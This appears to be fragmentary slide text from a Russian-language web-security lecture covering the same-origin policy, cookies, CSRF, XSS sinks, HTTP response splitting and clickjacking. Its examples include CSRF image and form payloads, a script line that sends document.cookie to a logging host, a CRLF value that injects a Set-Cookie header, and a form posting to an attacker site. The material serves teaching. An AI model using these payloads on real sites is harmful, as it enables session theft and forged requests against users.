2

3

- Браузер- Место положения- Открытые сессии- Пользователь

4

PROTOCOL://DOMAIN:port

Одинаковый источник:http://example.com/http://example.com/folder/

Разный источник:http://example.com/https://example.com/http://test.example.com/http://example.com:8080/http://othersample.com/

5

http://kiwi.com/test_restrict.html

6

http://kiwi.com/test_restrict.html

7

http://kiwi.com/test_restrict.html

8

http://kiwi.com/test_restrict.html

9

http://kiwi.com/test_restrict.html

http://kiwi.com/src_restrict.html

10

http://www.kiwi.com/test_restrict.html

11

XMLHttpRequest

- Метод запроса- Заголовок запроса- Чтение заголовков- Чтение ответа

12

..domain=.target.com – любой поддомен target.com

ограничения:- время жизни (expires,max-age) - локация (path, domain)- дополнительные аттрибуты (httponly, secure)

13

14

link

code req1 req2

15

…<img src=‘http://target.com/killme?id=1’>…

…<form action=‘http://target.com/killme’><input type=hidden name=id value=1></form>… <script>submitForm()</script>

16

link link

Injected responce

17

18

19

20

21

22

document.write()document.writeln()eval().innerHTMLetc

flash:getURL(_root.param,”_blank”)

23

…new Image().src="http://logger.com/?c="+encodeURI(document.cookie);…

24

25

26

27

28

29

…Location: <user input> …

http://target.com?jump=<user input>

http://target.com?jump=hell%0d%0aSet-Cookie: gotohell%3d1

…Location: hellSet-Cookie: gotohell=1 …

30

31

Split (target.com/somevuln/)

target.com

target (target.com/admin/)

32

Split (target.com/somevuln/)

target.com

target (target.com/admin/)

33

target.com

34

target.com

Fake target (target.com/admin/)

…<form action=“evilsite.com”>…

35

Upgrade

Upgrade

36

37

...style='position:absolute;

left:0px;

top:0px;

z-index:10000;'...

38